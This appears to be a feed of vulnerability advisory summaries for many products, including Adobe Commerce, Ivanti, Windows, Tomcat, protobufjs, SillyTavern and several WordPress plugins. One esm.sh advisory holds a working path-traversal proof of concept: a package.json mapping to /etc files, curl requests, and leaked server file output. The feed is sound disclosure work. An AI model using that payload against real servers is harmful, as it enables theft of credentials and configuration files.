Substance3D - Painter versions 12.0.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Illustrator versions 29.8.6, 30.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Local privilege escalation in Ivanti Endpoint Manager agent allows authenticated users to gain SYSTEM-level privileges via incorrect file or registry permissions. Affects all versions prior to 2024 SU6. Vendor has released a patch (version 2024 SU6). No evidence of active exploitation or public POC identified at time of analysis, though EPSS data not available. Organizations running EPM agents on managed endpoints should prioritize patching given the high CVSS score (7.8) and potential for lateral movement across enterprise environments.
Race condition in Ivanti Secure Access Client enables local privilege escalation to SYSTEM from low-privileged accounts. Affects versions before 22.8R6. An authenticated local user can exploit timing vulnerabilities in the client software to gain complete system control. While limited to local attack vector (requires existing access to the target system), the low attack complexity (AC:L) and lack of user interaction requirement (UI:N) make this exploitable once local access is achieved. No public exploit code identified at time of analysis, and EPSS risk scoring not yet available for this 2026 CVE.
Remote code execution in protobufjs (npm package) versions ≤7.5.5 and 8.0.0-8.0.1 allows attackers to inject and execute arbitrary JavaScript by supplying a malicious protobuf schema with crafted default values in bytes fields. When applications load untrusted protobuf descriptors and call toObject() with defaults enabled, attacker-controlled expressions are emitted into generated conversion functions and executed in the application context. Vendor-released patches are available in versions 7.5.6 and 8.0.2. No public exploit code identified at time of analysis, though the vulnerability is straightforward to weaponize given the clear preconditions in the advisory.
Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.
Blind SQL injection in WP Travel plugin versions ≤11.4.0 allows authenticated attackers with low-level privileges to extract sensitive database contents through time-based or boolean queries. The vulnerability enables cross-scope confidentiality breach with high impact (CVSS:C:H), permitting unauthorized access to all WordPress database information including user credentials, private travel booking details, and payment data. EPSS data unavailable; no CISA KEV listing indicates exploitation remains targeted rather than widespread. Patchstack's inclusion in their vulnerability database suggests active researcher interest and potential proof-of-concept development.
Heym before 0.0.21 contains an authorization bypass vulnerability in workflow execution that allows authenticated users to execute arbitrary workflows by referencing victim workflow UUIDs without proper access validation. Attackers can create workflows with execute nodes or agent subWorkflowIds pointing to victim workflow UUIDs to load and execute those workflows under attacker-controlled execution paths, exposing victim workflow outputs and triggering workflow nodes with unintended side effects.
Blind SQL injection in BEAR woo-bulk-editor plugin for WordPress up to version 1.1.7.1 allows high-privilege authenticated administrators to extract database contents through specially crafted SQL queries. The scope change in CVSS (S:C) indicates potential impact beyond the plugin itself, enabling access to other WordPress data or resources. No public exploit code or active exploitation indicators identified at time of analysis, but Patchstack public disclosure increases weaponization risk.
Session fixation in Pandora FMS versions 777-800 enables session hijacking when attackers supply crafted session IDs to users. Successful exploitation grants attackers complete access to victim user sessions with high confidentiality and integrity impact. No public exploit code identified at time of analysis, though attack complexity is low with network-based delivery requiring only user interaction (CVSS 7.6).
SQL injection in Pandora FMS versions 777-800 allows authenticated attackers with low privileges to exfiltrate or manipulate database contents via the graph container parameter. Attack complexity is high with present attack techniques, requiring specific timing conditions. No active exploitation confirmed per CISA KEV, and EPSS data not provided. Vendor advisory available from PandoraFMS confirms the vulnerability affecting a narrow version range spanning approximately builds 777 through 800.
Remote unauthenticated attackers can crash Zyxel NWA1100-N access points running customized firmware version 1.00(AACE.1)C0 by sending malformed HTTP requests that trigger buffer overflows in five distinct web server functions (formWep, formWlAc, formPasswordSetup, formUpgradeCert, formDelcert). The vulnerability enables denial-of-service attacks with high CVSS 7.5 severity but is limited to an end-of-life product according to Zyxel's reference documentation. No public exploit code identified at time of analysis, and EPSS data is unavailable for this recent CVE.
Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over a network.
A heap-based buffer overflow vulnerability exists in a Network management service of AOS-8 and AOS-10 that could allow an unauthenticated remote attacker to achieve remote code execution. Successful exploitation could allow an unauthenticated attacker to execute arbitrary code as a privileged user on the underlying operating system, potentially leading to a system compromise. Exploitation may also result in a denial-of-service (DoS) condition affecting the impacted system process.
Exposure of sensitive information to an unauthorized actor in Power Automate allows an authorized attacker to disclose information over a network.
SQL injection in the AIWU AI Chatbot WordPress plugin (versions ≤1.4.17) allows remote unauthenticated attackers to extract sensitive database contents via the getListForTbl() function due to unsanitized user input in SQL queries. Partial mitigation exists in version 1.4.11+ through administrator-only nonce protection, but the underlying SQL injection vulnerability persists. CVSS 7.5 (High) reflects network-accessible unauthenticated exploitation with high confidentiality impact. Wordfence provides detailed vulnerable code references across multiple plugin files including controller.php, req.php, and model.php. No evidence of active exploitation (not in CISA KEV) at time of analysis.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.
A vulnerability in a network management service of AOS-8 Operating System could allow an unauthenticated remote attacker to exploit this vulnerability by sending specially crafted network packets to the affected device, potentially resulting in a denial-of-service condition. Successful exploitation could cause the affected service process to terminate unexpectedly, disrupting normal device operations.
Missing release of memory after effective lifetime in Windows Internet Key Exchange (IKE) Protocol allows an unauthorized attacker to deny service over a network.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a Dependency on Vulnerable Third-Party Component vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.
The Court Reservation - Manage Your Court Bookings Online plugin for WordPress is vulnerable to generic SQL Injection via the ‘id’ parameter in all versions up to, and including, 1.10.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Use after free in Windows TCP/IP allows an unauthorized attacker to disclose information over a network.
Unauthenticated remote attackers can modify or delete arbitrary memory records in mem0 1.0.0 server by directly calling unprotected API endpoints including PUT /memories/{memory_id}. The vulnerability stems from complete absence of authentication and authorization controls on critical memory management functions, allowing data manipulation and loss without any verification of requester identity. EPSS score of 0.06% (18th percentile) indicates low exploitation probability in the wild, and no public exploit code or active exploitation (CISA KEV) has been identified at time of analysis.
Untrusted search path in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.
Remote denial of service in protobuf.js (npm package) allows unauthenticated attackers to crash Node.js processes by sending crafted protobuf payloads with deeply nested structures. The vulnerability affects the binary decoding path where unbounded recursion exhausts the JavaScript call stack. Version 7.5.6 and 8.0.2 patches are available. Applications decoding untrusted protobuf data over network APIs, message queues, or file uploads are at immediate risk. CVSS 7.5 (High) reflects network attack vector with no authentication required.
### Summary A Local File Inclusion (LFI) vulnerability exists in the esbuild plugin's handling of the `browser` field in `package.json`. An attacker can publish an npm package that causes the server to read and return arbitrary files from the host filesystem during the build process. ### Details The vulnerable code is in the `OnResolve` callback of the esbuild plugin: https://github.com/esm-dev/esm.sh/blob/main/server/build.go The plugin validates that resolved file paths stay within the package working directory. However, after this check, the `browser` field from `package.json` remaps the module path to an attacker-controlled value containing `../` sequences. No validation is performed after the remapping. ```go // Sandbox check passes for the original "./d1.txt" path if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("could not resolve module %s", specifier) } // ... later, browser field remaps to attacker-controlled path: if len(pkgJson.Browser) > 0 && ctx.isBrowserTarget() { if path, ok := pkgJson.Browser[modulePath]; ok { if path == "" { return esbuild.OnResolveResult{ Path: args.Path, Namespace: "browser-exclude", }, nil } if !isRelPathSpecifier(path) { externalPath, sideEffects, err := ctx.resolveExternalModule(path, args.Kind, withTypeJSON, analyzeMode) if err != nil { return esbuild.OnResolveResult{}, err } return esbuild.OnResolveResult{ Path: externalPath, SideEffects: sideEffects, External: true, }, nil } modulePath = path } } // path.Join collapses "../" sequences - escapes the package directory filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) // No second sandbox check ``` File contents appear in both the bundled JS output and the source map `sourcesContent` array. Readable files are constrained by esbuild's loader selection based on file extension: `.json` files must be valid JSON, `.txt`/`.html`/`.md` are read as raw text, files without a recognized extension must be syntactically valid JavaScript. The `config.json` of esm.sh is fully readable (valid JSON with `.json` extension). Non-existent target paths do not cause build errors - the import simply remains unresolved. This allows probing many paths in a single package, acting as a file existence oracle. ### PoC The test package is published at https://www.npmjs.com/package/chess-sec-utils1 **package.json:** ```json { "name": "chess-sec-utils1", "version": "1.0.6", "main": "index.js", "type": "module", "browser": { "./d1.txt": "../../../../../../../../etc/hostname", "./d2.json": "../../../../../../../../etc/os-release", "./d3.json": "../../../../../../../../etc/environment" } } ``` **index.js:** ```js import d1 from "./d1.txt" import d2 from "./d2.json" import d3 from "./d3.json" export default { d1, d2, d3 } ``` ```bash npm publish curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6" curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6/es2022/chess-sec-utils1.mjs.map" ``` Server file contents in source map response: ```json { "sourcesContent": [ "ideapad\n", "PRETTY_NAME=\"Ubuntu 22.04.5 LTS\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.04\"\nVERSION=\"22.04.5 LTS (Jammy Jellyfish)\"\nVERSION_CODENAME=jammy\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=jammy\n", "PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin\"\n", "import d1 from \"./d1.txt\"..." ] } ``` <img width="1720" height="796" alt="image" src="https://github.com/user-attachments/assets/ee1c9781-2c5c-4718-b436-f6cf453f0952" /> ### Impact An attacker can read sensitive files from the server, including the esm.sh `config.json` which may contain npm registry authentication tokens and S3 storage credentials. ### Fix Add a path validation check after the `browser` field remapping: ```go filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("path traversal blocked") } ``` ### Credit Svyatoslav Berestovsky of Metascan
arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer Digest authentication implementation in arduino-esp32 computes the authentication hash using the URI field from the client's Authorization header, without verifying that it matches the actual requested URI. This allows an attacker who possesses any valid digest response (computed for URI-A) to authenticate requests to a completely different protected URI (URI-B), bypassing per-resource access control. This vulnerability is fixed in 3.3.8.
Denial of service in multiparty (Node.js multipart/form-data parser) versions ≤4.2.3 crashes Node.js processes when attackers send crafted form uploads with field names matching JavaScript Object prototype properties (__proto__, constructor, toString). CVSS 7.5 (High) with network vector and no authentication required. No public exploit code identified at time of analysis, but exploitation is trivial given the straightforward prototype pollution attack pattern. Services accepting file uploads via multiparty are immediately affected until upgraded to 4.3.0+.
Deskflow is a keyboard and mouse sharing app. Prior to 1.26.0.167, a remote, unauthenticated denial of service (DoS) vulnerability affects Deskflow servers running with TLS enabled (the default). When any TCP peer connects to the listening port and its first bytes do not parse as a valid TLS ClientHello, SecureSocket::secureAccept enters its fatal-error branch and calls Arch::sleep(1) (a blocking 1-second sleep) on the multiplexer worker thread. That thread services every socket on the server, including established TLS clients delivering mouse motion, keyboard events, and clipboard updates. A single failed handshake therefore stalls input delivery to all connected screens for ~1 second, and a sustained drip of malformed connections (≥ 1/s) makes the server effectively unusable while the attack persists. This vulnerability is fixed in 1.26.0.167.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
Denial of service crashes multiparty Node.js parser versions ≤4.2.3 when processing malformed percent-encoded filename* parameters in multipart/form-data uploads. Attackers can remotely crash any Node.js service using vulnerable multiparty versions by sending a single crafted HTTP request with no authentication required (CVSS:3.1 AV:N/AC:L/PR:N/UI:N). No public exploit identified at time of analysis, but exploitation is trivial given the straightforward attack vector. Vendor-released patch: multiparty@4.3.0.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
Regular expression denial of service in multiparty (npm package) versions 4.2.3 and below allows remote unauthenticated attackers to block the Node.js event loop for seconds via crafted Content-Disposition headers in multipart uploads. The vulnerability triggers catastrophic backtracking in the filename parameter parser with headers as small as 8 KB. Fixed in multiparty 4.3.0. EPSS data not available; no active exploitation confirmed at time of analysis, but the low complexity (AV:N/AC:L/PR:N/UI:N) and availability of detailed public advisory increase weaponization risk for any web service accepting file uploads through this library.
Complete process crash in Dalfox REST server v2.12.0 and earlier allows remote unauthenticated attackers to terminate the entire scan engine via a single HTTP request. The flaw stems from a closed-channel write panic in pkg/scanning/parameterAnalysis.go where two sequential worker stages share a single results channel, causing a Go runtime panic when the second stage attempts to write to the already-closed channel. Default deployments run without authentication (no --api-key), making the vulnerability remotely exploitable. CVSS 7.5 (High). Patched in v2.13.0 per GitHub advisory GHSA-2g4x-fq3j-cgq4. No CISA KEV listing or public exploit code identified at time of analysis.
Remote unauthenticated attackers can access confidential data from other users' chat sessions in Spring AI applications due to insecure default configuration in the chat memory component. The vulnerability allows network-based exploitation with no authentication required (CVSS:3.1 AV:N/AC:L/PR:N/UI:N) and impacts confidentiality only (C:H/I:N/A:N), enabling cross-user data leakage in multi-tenant AI chat implementations. Reported by VMware, affecting Java-based Spring AI deployments where developers have not explicitly configured chat memory isolation.
Vulnerabilities exist in a protocol-handling component of AOS-8 and AOS-10 Operating Systems. An unauthenticated attacker could exploit these vulnerabilities by sending specially crafted network messages to the affected service. Due to insufficient input validation, successful exploitation may terminate a critical system process, resulting in a denial-of-service condition.
Vulnerabilities exist in a protocol-handling component of AOS-8 and AOS-10 Operating Systems. An unauthenticated attacker could exploit these vulnerabilities by sending specially crafted network messages to the affected service. Due to insufficient input validation, successful exploitation may terminate a critical system process, resulting in a denial-of-service condition.
Improper Handling of Case Sensitivity vulnerability in LockOutRealm in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Older unsupported versions may also be affected. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.
Denial of service in Apache Tomcat 9.x, 10.1.x, and 11.0.x allows remote unauthenticated attackers to exhaust server resources due to missing limits or throttling on a resource allocation path (CWE-770). Affected versions span 11.0.0-M1 through 11.0.21, 10.1.0-M1 through 10.1.54, and 9.0.0.M1 through 9.0.117, with older unsupported branches also implicated per the EUVD entry. No public exploit identified at time of analysis, and the EPSS score is very low (0.02%, 5th percentile), but the SSVC framework flags the issue as automatable with partial technical impact.
SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials versions 0.78.2, 0.7.0 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
### Summary Changing a user’s password does not invalidate existing sessions, allowing an attacker with a stolen cookie to retain access even after the victim resets their password. ### Details SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. ### PoC 1.Log into the same SillyTavern account from two different browsers (e.g., Chrome and Firefox private mode). 2.In Chrome, change the account password under User Settings → Change Password. 3.In Firefox, refresh the page or perform a protected action (e.g., view API keys). 4.Expected: Firefox session should be invalidated and ask for login. 5.Actual: Firefox remains fully authenticated, able to perform all actions as the targeted user. ### Impact An attacker who obtains a valid session cookie (via XSS, MITM, physical access, etc.) can continue using it indefinitely, even after the legitimate user changes their password. This nullifies the most common recovery measure against session theft. The default cookie lifespan is 400 days, giving an attacker a very long exploitation window. ### Resolution A fix was released in the version 1.18.0, invalidating a session cookie on account password change.
An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2. An app may be able to access sensitive user data.
Unauthenticated arbitrary file read in dalfox REST API server mode allows remote attackers to exfiltrate sensitive files from the host filesystem. The vulnerability chains two flaws: missing authentication middleware when no API key is set (default configuration), and unsanitized deserialization of the `custom-payload-file` JSON parameter directly into the scan engine. Remote attackers can supply any file path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`, cloud credential files) and the engine reads each line, embeds it as an XSS payload, and transmits it to an attacker-controlled HTTP endpoint via dalfox's own scan traffic. No exploit code is publicly identified at time of analysis; vendor-released patch available in version 2.13.0.
Prototype pollution in protobufjs allows denial of service through corrupted JavaScript built-ins when parsing untrusted schemas. Attackers who control protobuf schemas or JSON descriptors can write to inherited object properties on global constructors, causing process-wide state corruption that persists until restart. CVSS 7.5 (High) with network vector and no authentication required, but real-world risk is limited to applications parsing schemas from untrusted sources-applications only decoding untrusted message payloads with trusted schemas are not affected. Vendor-released patches available: v7.5.6 and v8.0.2. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.